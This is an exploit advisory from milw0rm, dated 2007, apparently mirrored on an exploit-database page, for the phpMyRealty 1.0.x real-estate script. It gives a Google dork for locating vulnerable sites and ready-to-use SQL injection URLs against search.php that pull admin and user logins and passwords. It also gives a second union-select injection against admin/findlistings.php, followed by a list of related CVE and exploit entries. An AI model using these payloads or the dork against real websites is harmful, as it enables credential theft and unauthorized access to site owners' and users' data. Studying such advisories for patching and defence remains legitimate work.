# xaker.name & grabberz.com # # .__ __. # NN) NNNN JNNN` NNNN. NNN NNNNNNNNNNN NN) # NN) `NNN).NNNF .NNNNN (NN) """4NNN"""` NN) # NN) (NNNNNN` (NNNNN) NNN (NNN NN) # NN) 4NNNN` NNN(NNN.NNF NNN) NN) # NN) JNNNNL (NN) NNNNNN) (NNN NN) # NN) JNNNNNN) JNN` `NNNNN JNNF NN) # NN) .NNNF (NNN. NNN 4NNN) NNN) NN) # NN) JNNN` NNNN (NN) NNN` (NNN NN) # NN) NN) # .__ http://xaker.name __. # # # script name : phpMyRealty 1.0.x # GoogLe Dork : Powered by phpMyRealty # Script demo : www.phpmyrealty.com/demo/index.php # The price : $99.95 # Risk : Average # Found By : Koller # Thanks : | robo9 | rijy | Concord | Helkern | Constantine | -St1ff- | .dot | @$_terr_X | b3 | # Vulnerable files : search.php, findlistings.php # Vuln : www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins # www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_users # # Admin panel: www.victim.com/admin/index.php # # Addon :) - sql-injection in findlistings.php # www.victim.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* # Contact: K0ller (at) hotmail (dot) CoM # milw0rm.com [2007-12-18]
Related Exploits
Trying to match CVEs (1): CVE-2007-6472Trying to match OSVDBs (2): 39267, 39268
Other Possible E-DB Search Terms: PHPMyRealty 1.0.x, PHPMyRealty
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2008-08-27 |  |
|
PHPMyRealty 1.0.9 - Multiple SQL Injections | ~!Dok_tOR!~ |
| 2008-08-01 | |
|
phpMyRealty 2.0.0 - 'location' Parameter SQL Injection | CraCkEr |
| 2011-08-19 | |
|
PHPMyRealty 1.0.7 - SQL Injection | H4T$A |